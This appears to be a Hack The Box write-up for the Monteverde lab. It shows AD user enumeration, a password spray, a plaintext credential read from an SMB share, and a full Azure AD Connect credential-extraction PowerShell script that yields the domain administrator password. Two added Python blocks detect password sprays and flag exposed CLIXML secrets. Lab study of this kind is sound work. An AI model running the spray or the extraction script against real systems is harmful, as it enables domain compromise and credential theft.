HTB — Monteverde
Azure AD Connect with user enumeration via RPC. Password spraying finds default creds. Azure AD Sync password extraction for Domain Admin.
nmap
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.172
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-20 19:43 EST
Stats: 0:01:44 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 77.78% done; ETC: 19:45 (0:00:05 remaining)
Stats: 0:01:49 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 77.78% done; ETC: 19:45 (0:00:06 remaining)
Nmap scan report for 10.10.10.172
Host is up (0.024s latency).
Not shown: 65517 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-21 00:45:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 1s
| smb2-time:
| date: 2025-01-21T00:46:25
|_ start_date: N/A
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 24.02 ms 10.10.14.1
2 24.14 ms 10.10.10.172
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 187.55 seconds
445
445/tcp open microsoft-ds?
smbclient -N -L \\\\10.10.10.172
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
smbclient -N -L \\\\10.10.10.172 -U 'guest'
session setup failed: NT_STATUS_LOGON_FAILURE
rpc
rpcclient -U "" 10.10.10.172
samrdump.py 10.10.10.172
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Retrieving endpoint list from 10.10.10.172
Found domain(s):
. MEGABANK
. Builtin
[*] Looking up users in domain MEGABANK
Found user: Guest, uid = 501
Found user: AAD_987d7f2f57d2, uid = 1104
Found user: mhope, uid = 1601
Found user: SABatchJobs, uid = 2602
Found user: svc-ata, uid = 2603
Found user: svc-bexec, uid = 2604
Found user: svc-netapp, uid = 2605
Found user: dgalanos, uid = 2613
Found user: roleary, uid = 2614
Found user: smorgan, uid = 2615
Guest (501)/FullName:
Guest (501)/AdminComment: Built-in account for guest access to the computer/domain
Guest (501)/UserComment:
Guest (501)/PrimaryGroupId: 514
Guest (501)/BadPasswordCount: 1
Guest (501)/LogonCount: 0
Guest (501)/PasswordLastSet: <never>
Guest (501)/PasswordDoesNotExpire: True
Guest (501)/AccountIsDisabled: True
Guest (501)/ScriptPath:
AAD_987d7f2f57d2 (1104)/FullName: AAD_987d7f2f57d2
AAD_987d7f2f57d2 (1104)/AdminComment: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
AAD_987d7f2f57d2 (1104)/UserComment:
AAD_987d7f2f57d2 (1104)/PrimaryGroupId: 513
AAD_987d7f2f57d2 (1104)/BadPasswordCount: 0
AAD_987d7f2f57d2 (1104)/LogonCount: 11
AAD_987d7f2f57d2 (1104)/PasswordLastSet: 2020-01-02 17:53:24.984897
AAD_987d7f2f57d2 (1104)/PasswordDoesNotExpire: True
AAD_987d7f2f57d2 (1104)/AccountIsDisabled: False
AAD_987d7f2f57d2 (1104)/ScriptPath:
mhope (1601)/FullName: Mike Hope
mhope (1601)/AdminComment:
mhope (1601)/UserComment:
mhope (1601)/PrimaryGroupId: 513
mhope (1601)/BadPasswordCount: 0
mhope (1601)/LogonCount: 2
mhope (1601)/PasswordLastSet: 2020-01-02 18:40:05.908924
mhope (1601)/PasswordDoesNotExpire: True
mhope (1601)/AccountIsDisabled: False
mhope (1601)/ScriptPath:
SABatchJobs (2602)/FullName: SABatchJobs
SABatchJobs (2602)/AdminComment:
SABatchJobs (2602)/UserComment:
SABatchJobs (2602)/PrimaryGroupId: 513
SABatchJobs (2602)/BadPasswordCount: 0
SABatchJobs (2602)/LogonCount: 0
SABatchJobs (2602)/PasswordLastSet: 2020-01-03 07:48:46.392235
SABatchJobs (2602)/PasswordDoesNotExpire: True
SABatchJobs (2602)/AccountIsDisabled: False
SABatchJobs (2602)/ScriptPath:
svc-ata (2603)/FullName: svc-ata
svc-ata (2603)/AdminComment:
svc-ata (2603)/UserComment:
svc-ata (2603)/PrimaryGroupId: 513
svc-ata (2603)/BadPasswordCount: 0
svc-ata (2603)/LogonCount: 0
svc-ata (2603)/PasswordLastSet: 2020-01-03 07:58:31.332169
svc-ata (2603)/PasswordDoesNotExpire: True
svc-ata (2603)/AccountIsDisabled: False
svc-ata (2603)/ScriptPath:
svc-bexec (2604)/FullName: svc-bexec
svc-bexec (2604)/AdminComment:
svc-bexec (2604)/UserComment:
svc-bexec (2604)/PrimaryGroupId: 513
svc-bexec (2604)/BadPasswordCount: 0
svc-bexec (2604)/LogonCount: 0
svc-bexec (2604)/PasswordLastSet: 2020-01-03 07:59:55.863422
svc-bexec (2604)/PasswordDoesNotExpire: True
svc-bexec (2604)/AccountIsDisabled: False
svc-bexec (2604)/ScriptPath:
svc-netapp (2605)/FullName: svc-netapp
svc-netapp (2605)/AdminComment:
svc-netapp (2605)/UserComment:
svc-netapp (2605)/PrimaryGroupId: 513
svc-netapp (2605)/BadPasswordCount: 0
svc-netapp (2605)/LogonCount: 0
svc-netapp (2605)/PasswordLastSet: 2020-01-03 08:01:42.786264
svc-netapp (2605)/PasswordDoesNotExpire: True
svc-netapp (2605)/AccountIsDisabled: False
svc-netapp (2605)/ScriptPath:
dgalanos (2613)/FullName: Dimitris Galanos
dgalanos (2613)/AdminComment:
dgalanos (2613)/UserComment:
dgalanos (2613)/PrimaryGroupId: 513
dgalanos (2613)/BadPasswordCount: 0
dgalanos (2613)/LogonCount: 0
dgalanos (2613)/PasswordLastSet: 2020-01-03 08:06:10.519660
dgalanos (2613)/PasswordDoesNotExpire: True
dgalanos (2613)/AccountIsDisabled: False
dgalanos (2613)/ScriptPath:
roleary (2614)/FullName: Ray O'Leary
roleary (2614)/AdminComment:
roleary (2614)/UserComment:
roleary (2614)/PrimaryGroupId: 513
roleary (2614)/BadPasswordCount: 0
roleary (2614)/LogonCount: 0
roleary (2614)/PasswordLastSet: 2020-01-03 08:08:05.832167
roleary (2614)/PasswordDoesNotExpire: True
roleary (2614)/AccountIsDisabled: False
roleary (2614)/ScriptPath:
smorgan (2615)/FullName: Sally Morgan
smorgan (2615)/AdminComment:
smorgan (2615)/UserComment:
smorgan (2615)/PrimaryGroupId: 513
smorgan (2615)/BadPasswordCount: 0
smorgan (2615)/LogonCount: 0
smorgan (2615)/PasswordLastSet: 2020-01-03 08:09:21.629084
smorgan (2615)/PasswordDoesNotExpire: True
smorgan (2615)/AccountIsDisabled: False
smorgan (2615)/ScriptPath:
[*] Received 10 entries.
kerbrute userenum -d MEGABANK.LOCAL --dc 10.10.10.172 users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 01/20/25 - Ronnie Flathers @ropnop
2025/01/20 20:15:03 > Using KDC(s):
2025/01/20 20:15:03 > 10.10.10.172:88
2025/01/20 20:15:03 > [+] VALID USERNAME: roleary@MEGABANK.LOCAL
2025/01/20 20:15:03 > [+] VALID USERNAME: SABatchJobs@MEGABANK.LOCAL
2025/01/20 20:15:03 > [+] VALID USERNAME: AAD_987d7f2f57d2@MEGABANK.LOCAL
2025/01/20 20:15:03 > [+] VALID USERNAME: svc-netapp@MEGABANK.LOCAL
2025/01/20 20:15:03 > [+] VALID USERNAME: svc-bexec@MEGABANK.LOCAL
2025/01/20 20:15:03 > [+] VALID USERNAME: dgalanos@MEGABANK.LOCAL
2025/01/20 20:15:03 > [+] VALID USERNAME: mhope@MEGABANK.LOCAL
2025/01/20 20:15:03 > [+] VALID USERNAME: svc-ata@MEGABANK.LOCAL
2025/01/20 20:15:03 > [+] VALID USERNAME: smorgan@MEGABANK.LOCAL
2025/01/20 20:15:03 > Done! Tested 10 usernames (9 valid) in 0.033 seconds
password spraying and password reuse
nxc smb 10.10.10.172 -u users.txt -p users.txt
(STATUS_LOGON_FAILURE lines for the other combinations omitted)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
- note: with a file for both -u and -p nxc tries every user/password combination, 10 attempts per account here; check the lockout policy first, and use --no-bruteforce to pair line N with line N when the check is only "username as password"
nxc smb 10.10.10.172 -u SABatchJobs -p SABatchJobs
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
nxc winrm 10.10.10.172 -u SABatchJobs -p SABatchJobs
WINRM 10.10.10.172 5985 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
WINRM 10.10.10.172 5985 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
creds
SABatchJobs:SABatchJobs
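From the blue side, the spray above is one source address failing logons against many distinct accounts in a short burst, followed by a success from the same address. The detector below is an added example, not part of the original writeup: it runs over constructed Security-log lines shaped like that nxc run (one 4625 failure per sprayed account, one 4624 success). The key=value line format is made up for the example; the event IDs and SubStatus codes are the standard Windows ones. The kerbrute step above goes over Kerberos and would appear as KDC events (4768/4771) on the DC rather than 4625, so a rule keyed on 4625 alone does not see it.

```python
"""Password-spray detection over Windows logon events.

Added example, not part of the original writeup. The log lines are
constructed to mirror the nxc spray above and are not real Monteverde logs.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a SIEM-style key=value export of Security log events.
# 4625 = failed logon, 4624 = successful logon. SubStatus 0xC000006A = wrong
# password for a valid account, 0xC0000072 = account disabled (Guest),
# 0xC0000064 = account does not exist (would show up when spraying bad names).
SAMPLE_LOG = """\
2025-01-20T20:30:01Z EventID=4625 LogonType=3 TargetUserName=Guest IpAddress=10.10.14.5 SubStatus=0xC0000072
2025-01-20T20:30:01Z EventID=4625 LogonType=3 TargetUserName=AAD_987d7f2f57d2 IpAddress=10.10.14.5 SubStatus=0xC000006A
2025-01-20T20:30:01Z EventID=4625 LogonType=3 TargetUserName=mhope IpAddress=10.10.14.5 SubStatus=0xC000006A
2025-01-20T20:30:02Z EventID=4624 LogonType=3 TargetUserName=SABatchJobs IpAddress=10.10.14.5
2025-01-20T20:30:02Z EventID=4625 LogonType=3 TargetUserName=svc-ata IpAddress=10.10.14.5 SubStatus=0xC000006A
2025-01-20T20:30:02Z EventID=4625 LogonType=3 TargetUserName=svc-bexec IpAddress=10.10.14.5 SubStatus=0xC000006A
2025-01-20T20:30:03Z EventID=4625 LogonType=3 TargetUserName=svc-netapp IpAddress=10.10.14.5 SubStatus=0xC000006A
2025-01-20T20:30:03Z EventID=4625 LogonType=3 TargetUserName=dgalanos IpAddress=10.10.14.5 SubStatus=0xC000006A
2025-01-20T20:30:03Z EventID=4625 LogonType=3 TargetUserName=roleary IpAddress=10.10.14.5 SubStatus=0xC000006A
2025-01-20T20:30:04Z EventID=4625 LogonType=3 TargetUserName=smorgan IpAddress=10.10.14.5 SubStatus=0xC000006A
2025-01-20T20:45:00Z EventID=4625 LogonType=3 TargetUserName=mhope IpAddress=10.10.14.9 SubStatus=0xC000006A
2025-01-20T20:46:30Z EventID=4625 LogonType=3 TargetUserName=mhope IpAddress=10.10.14.9 SubStatus=0xC000006A
"""


def parse_event(line: str) -> dict:
    """Turn one 'TIMESTAMP key=value ...' line into a dict with a datetime 'ts'."""
    ts, *fields = line.split()
    event = dict(field.split("=", 1) for field in fields)
    event["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return event


def detect_spray(log_text: str, window: timedelta = timedelta(minutes=5),
                 min_users: int = 5) -> list:
    """One alert per source IP that fails logons for at least `min_users`
    distinct accounts inside some `window`. Each alert also lists accounts that
    logged on successfully from that IP in the same window (the spray that hit).
    A single account failing repeatedly (brute force, or a typo) is not a spray
    and is not reported here."""
    events = sorted((parse_event(l) for l in log_text.splitlines() if l.strip()),
                    key=lambda e: e["ts"])
    by_ip = defaultdict(list)
    for event in events:
        by_ip[event["IpAddress"]].append(event)

    alerts = []
    for ip, evs in by_ip.items():
        best = None
        # Try every event as the start of a window and keep the window with the
        # most distinct failed accounts. Quadratic per IP, fine for a log slice.
        for i, first in enumerate(evs):
            win = [e for e in evs[i:] if e["ts"] - first["ts"] <= window]
            failed = {e["TargetUserName"] for e in win if e["EventID"] == "4625"}
            if len(failed) < min_users:
                continue
            if best is None or len(failed) > len(best["failed_users"]):
                best = {
                    "ip": ip,
                    "failed_users": sorted(failed),
                    "successes": sorted({e["TargetUserName"] for e in win
                                         if e["EventID"] == "4624"}),
                    "start": first["ts"],
                    "end": win[-1]["ts"],
                }
        if best is not None:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_LOG):
        print(f"{alert['ip']}: {len(alert['failed_users'])} accounts failed between "
              f"{alert['start']:%H:%M:%S} and {alert['end']:%H:%M:%S}; "
              f"successful logons in the same window: {alert['successes'] or 'none'}")
```

The threshold and window are the knobs to tune against the lockout policy: a sprayer who knows the policy stays under the failure count per account, but cannot avoid touching many accounts from the same source, which is what the distinct-user count catches.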
bloodhound
sudo bloodhound-python -u 'SABatchJobs' -p 'SABatchJobs' -ns 10.10.10.172 -d MEGABANK.LOCAL -c all
zip -r MEGABANK.LOCAL.zip *.json
shares
nxc smb 10.10.10.172 -u SABatchJobs -p SABatchJobs --shares
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
SMB 10.10.10.172 445 MONTEVERDE [*] Enumerated shares
SMB 10.10.10.172 445 MONTEVERDE Share Permissions Remark
SMB 10.10.10.172 445 MONTEVERDE ----- ----------- ------
SMB 10.10.10.172 445 MONTEVERDE ADMIN$ Remote Admin
SMB 10.10.10.172 445 MONTEVERDE azure_uploads READ
SMB 10.10.10.172 445 MONTEVERDE C$ Default share
SMB 10.10.10.172 445 MONTEVERDE E$ Default share
SMB 10.10.10.172 445 MONTEVERDE IPC$ READ Remote IPC
SMB 10.10.10.172 445 MONTEVERDE NETLOGON READ Logon server share
SMB 10.10.10.172 445 MONTEVERDE SYSVOL READ Logon server share
SMB 10.10.10.172 445 MONTEVERDE users$ READ
smbclient \\\\10.10.10.172\\"users$" -U 'MEGABANK.LOCAL/SABatchJobs'
Password for [MEGABANK.LOCAL\SABatchJobs]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jan 3 08:12:48 2020
.. D 0 Fri Jan 3 08:12:48 2020
dgalanos D 0 Fri Jan 3 08:12:30 2020
mhope D 0 Fri Jan 3 08:41:18 2020
roleary D 0 Fri Jan 3 08:10:30 2020
smorgan D 0 Fri Jan 3 08:10:24 2020
smb: \mhope\> get azure.xml azure.xml
cat azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
creds
nxc smb 10.10.10.172 -u users.txt -p '4n0therD4y@n0th3r$' --continue-on-success
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\smorgan:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\roleary:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\dgalanos:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-netapp:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-bexec:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-ata:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
mhope:4n0therD4y@n0th3r$
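The azure.xml pulled from users$ is what PowerShell's Export-Clixml writes for a PSADPasswordCredential: the Password property is serialized as a plain <S> string, so anyone with read access to the share has the secret. The parser below is an added example, not part of the original writeup or of any Microsoft tooling. Object 0 in the sample is the azure.xml recovered above; object 1 is a constructed exported PSCredential whose Password is a SecureString, which Export-Clixml writes as an <SS> element holding a DPAPI blob (the blob bytes here are a placeholder). The parser reports each secret-looking property with which of the two serializations it has, since only the first kind is directly usable off the box.

```python
"""Credential extraction from PowerShell CLIXML (Export-Clixml) files.

Added example, not part of the original writeup. Object 0 of the sample is
the azure.xml from the users$ share; object 1 is constructed for contrast.
"""
import xml.etree.ElementTree as ET

PS_NS = {"ps": "http://schemas.microsoft.com/powershell/2004/04"}
SECRET_HINTS = ("password", "secret", "token")   # property names worth reporting

SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
  <Obj RefId="1">
    <TN RefId="1">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <Props>
      <S N="UserName">MEGABANK\\svc-example</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0100000000</SS>
    </Props>
  </Obj>
</Objs>"""


def extract_secrets(clixml: str) -> list:
    """Return one record per serialized object that carries a secret-looking
    property: the object's .NET type plus each hit tagged 'plaintext' (<S>) or
    'dpapi' (<SS>, a ConvertFrom-SecureString blob recoverable only as the
    exporting user on the exporting machine)."""
    root = ET.fromstring(clixml)
    results = []
    for obj in root.iter(f"{{{PS_NS['ps']}}}Obj"):
        props = obj.find("ps:Props", PS_NS)
        if props is None:
            continue
        hits = {}
        for prop in props:
            name = prop.get("N", "")
            if not any(hint in name.lower() for hint in SECRET_HINTS):
                continue
            tag = prop.tag.rsplit("}", 1)[-1]      # strip the XML namespace
            if tag == "S":
                hits[name] = {"protection": "plaintext", "value": prop.text or ""}
            elif tag == "SS":
                hits[name] = {"protection": "dpapi", "value": prop.text or ""}
        if hits:
            type_name = obj.find("ps:TN/ps:T", PS_NS)   # first entry is the concrete type
            results.append({"type": type_name.text if type_name is not None else "unknown",
                            "secrets": hits})
    return results


if __name__ == "__main__":
    for rec in extract_secrets(SAMPLE_CLIXML):
        for name, hit in rec["secrets"].items():
            print(f"{rec['type']}.{name}: [{hit['protection']}] {hit['value']}")
```

ConvertFrom-SecureString without -Key protects the string with DPAPI under the calling user's profile, so an <SS> blob copied off the host needs that user's DPAPI master key before it is worth anything; a plain <S> password like the one in azure.xml is the finding as-is.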
nxc winrm 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$' --continue-on-success
WINRM 10.10.10.172 5985 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
WINRM 10.10.10.172 5985 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)
winrm
evil-winrm -i 10.10.10.172 -u 'mhope' -p '4n0therD4y@n0th3r$'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> whoami
megabank\mhope
user.txt
*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt
febac519...
winpeas
╔══════════╣ Cloud Credentials
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials
C:\Users\mhope\.azure\TokenCache.dat (Azure Token Cache)
Accessed:1/3/2020 5:36:14 AM -- Size:7896
C:\Users\mhope\.azure\AzureRMContext.json (Azure RM Context)
Accessed:1/3/2020 5:35:57 AM -- Size:2794
- mhope is a member of the Azure Admins group; together with the AAD_ sync service account seen in samrdump, Azure AD Connect on this host is the privesc path

wget https://gist.githubusercontent.com/xpn/0dc393e9.../raw/d45633c954ee3d40be1bff82648750f516cd3b80/azuread_decrypt_msol.ps1
*Evil-WinRM* PS C:\Users\mhope> upload azuread_decrypt_msol.ps1
ADSync
- following xpn's post (and the ippsec video): https://blog.xpnsec.com/azuread-connect-for-redteam/
*Evil-WinRM* PS C:\Users\mhope> sqlcmd -q "SELECT name FROM master.dbo.sysdatabases"
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
ADSync
(5 rows affected)
- per xpn's post: the ADSync database stores the metadata and configuration for the Azure AD Sync service. The mms_management_agent table has a private_configuration_xml column whose XML describes the AD connector's forest-login (MSOL) account, and an encrypted_configuration column holding that account's password; the key that decrypts it is unlocked from the keyset_id, instance_id and entropy values in mms_server_configuration (the arguments to KeyManager.LoadKeySet in the script).
*Evil-WinRM* PS C:\Users\mhope> sqlcmd -q "use ADSync; SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
Changed database context to 'ADSync'.
keyset_id instance_id entropy
----------- ------------------------------------ ------------------------------------
1 1852B527-DD4F-4ECF-B541-EFCCBFF29E31 194EC2FC-F186-46CF-B44D-071EB61F49CD
(1 rows affected)
*Evil-WinRM* PS C:\Users\mhope> sqlcmd -q "use ADSync; SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
Changed database context to 'ADSync'.
private_configuration_xml encrypted_configuration
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<adma-configuration>
<forest-name>MEGABANK.LOCAL</forest-name>
<forest-port>0</forest-port>
<forest-guid>{00000000-0000-0000-0000-000000000000}</forest-guid>
<forest-login-user>administrator</forest-login-user>
<forest-login-domain>MEGABANK.LOCAL 8AAAAAgAAABQhCBBnwTpdfQE6uNJeJWGjvps08skADOJDqM74hw39rVWMWrQukLAEYpfquk2CglqHJ3GfxzNWlt9+ga+2wmWA0zHd3uGD8vk/vfnsF3p2aKJ7n9IAB51xje0QrDLNdOqOxod8n7VeybNW/1k+YWuYkiED3xO8Pye72i6D9c5QTzjTlXe5qgd4TCdp4fmVd+UlL/dWT/mhJHve/d9zFr2EX5r5+1TLbJCzYUHqFLvvpCd1rJEr68g
(1 rows affected)
- sqlcmd truncates both columns at its default width: the XML is cut off after forest-login-domain and the base64 encrypted_configuration is printed right after it. The script reads the full values over ADO.NET, so the truncation does not matter.
- running the original gist as-is throws an error on this host
- inspect it line by line and fix the failing statement
Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()
add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
- the failure comes from the connection string on the second line and surfaces when $client.Open() runs: the gist targets SQL Server LocalDB, (localdb)\.\ADSync, which is not installed here; on this box ADSync lives in the default local SQL Server instance, the one sqlcmd was already talking to
*Evil-WinRM* PS C:\Users\mhope> $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
*Evil-WinRM* PS C:\Users\mhope> $client.Open()
Exception calling "Open" with "0" argument(s): "A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: SQL Network Interfaces, error: 52 - Unable to locate a Local Database Runtime installation. Verify that SQL Server Express is properly installed and that the Local Database Runtime feature is enabled.)"
At line:1 char:1
+ $client.Open()
+ ~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : SqlException
- fix from the ippsec video and this post: https://www.sqlshack.com/connecting-powershell-to-sql-server/ ; point the connection string at the local default instance with integrated (Windows) authentication, the same access sqlcmd was using
- the new line opens without error
- swap it into the ps1 script, re-upload and run it
*Evil-WinRM* PS C:\Users\mhope> $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Integrated Security=true;Initial Catalog=ADSync"
*Evil-WinRM* PS C:\Users\mhope> $client.Open()
*Evil-WinRM* PS C:\Users\mhope> upload azuread_decrypt_msol.ps1
*Evil-WinRM* PS C:\Users\mhope> .\azuread_decrypt_msol.ps1
AD Connect Sync Credential Extract POC (@_xpn_)
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!
creds
administrator:d0m@in4dminyeah!
impacket-psexec administrator:'d0m@in4dminyeah!'@10.10.10.172
